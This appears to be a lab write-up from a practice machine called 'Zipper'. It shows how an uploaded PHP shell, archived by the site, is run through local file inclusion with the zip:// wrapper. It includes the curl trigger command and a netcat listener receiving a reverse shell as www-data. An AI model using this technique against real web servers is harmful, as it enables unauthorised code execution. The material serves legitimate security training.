zip:// with LFI
Given the target web application explicitly performs archiving operation using the PHP’s ZipArchive class, it is likely that archive protocols (zip and rar) are enabled in the backend. If that the case, I can get code execution by uploading a PHP file, have the upload.php file archive and save it in the /uploads directory and access it via LFI in the file parameter of the index.php file with the zip:// protocol.
/Practice/Zipper/3-Exploitation/attachments/{053BD940-5BEE-4077-9B9A-AE48DA953BE3}.png)
I will first upload the payload; shell.php
/Practice/Zipper/3-Exploitation/attachments/{F5B0B071-A063-4BA5-9043-FDEF1236FF10}.png)
/Practice/Zipper/3-Exploitation/attachments/{ADCE320B-E003-4657-93C5-8747E49D94F1}.png)
The backend successfully archived and saved the payload; shell.php
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/zipper]
└─$ curl -s http://$IP/index.php?file=zip://uploads/upload_1743947496.zip%23shellInvoking the payload via LFI in the file parameter of the index.php file with the zip:// protocol.
The .php extension is omitted as it gets appended
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/zipper]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.201.229] 47868
SOCKET: Shell has connected! PID: 3784
whoami
www-data
hostname
zipper
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:9e:e7:9a brd ff:ff:ff:ff:ff:ff
inet 192.168.201.229/24 brd 192.168.201.255 scope global ens160
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the www-data account via exploiting the target web application’s archiving logic with LFI